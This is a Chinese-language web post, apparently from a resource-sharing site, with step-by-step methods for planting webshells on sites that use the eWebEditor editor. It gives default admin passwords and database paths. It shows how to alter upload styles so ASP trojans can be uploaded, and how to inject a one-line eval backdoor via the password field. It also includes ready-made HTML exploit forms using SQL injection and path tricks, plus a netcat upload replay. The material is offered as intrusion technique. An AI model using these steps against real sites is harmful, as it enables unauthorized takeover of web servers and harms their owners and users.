也想出现在这里? 联系我们

脚本入侵 入侵ewebeditor编辑器一些技巧

作者 : 小编 本文共2042个字,预计阅读时间需要6分钟 发布时间: 2021-06-11 共1.22K人阅读
也想出现在这里? 联系我们

eWebEditor编辑器 建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理 默认后台地址:/ewebeditor/admin_login.asp 使用默认密码:admin/admin 或 admin/admin888 不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb 拿webshell方法第一种方法 登陆后台点击“样式管理”-选择新增样式 只写这几样 大家照做就行了 样式名称:chouxiaozi 随便写 路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx 这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了 上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马 内容路径:空 记得 图片限制:写上1000 免的上不了我们的asp木马 然后我们就可以提交了 就可以看到样式增加成功! 然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置 在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击 然后上传我们的刚才添加的格式的木马 拿webshell方法第二种方法 登陆后台,点击修改密码—新密码设置为 1":eval request("choxiaozi")’ 设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了. 然后用一句话客户端连接 拿webshell方法第三种方法 ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell 下载教程看 拿webshell方法第四种方法 利用ewebeditor asp版 2.1.6 上传漏洞利用程序 首先先看eWebEditor/upload.asp 上传地址存在不 存在的话就把下面的代码保存为 H1>ewebeditor asp版 2.1.6 上传漏洞利用程序—-</H1><br><br> <form action="这里写上传地址?action=save&type=IMAGE&style=luoye\’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b\’|cer\’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=\’standard\’and\’a\’=\’a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> 改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件 就可以看到我们上传的路径和地址 拿webshell方法第五种方法 ewebeditor 鸡肋的上传漏洞 首先先看下ewebeditor/asp/upload.asp 上传地址存在不 存在就 把下面的代码 <form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form> 然后保存为chouxiaozi.html 打开可以直接上传gif文件,测试成功.上传后地址看源文件 就可以看到我们上传的路径和地址 拿webshell方法第六种方法 利用eWebEditor/upload.asp 抓包和nc上传 抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt 然后用编译C32asm 或等等编译工具 修改 然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt 不懂抓包和nc上传 百度搜索相关教程 回头说下有时候进了个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址 我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 脚本入侵 入侵ewebeditor编辑器一些技巧

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录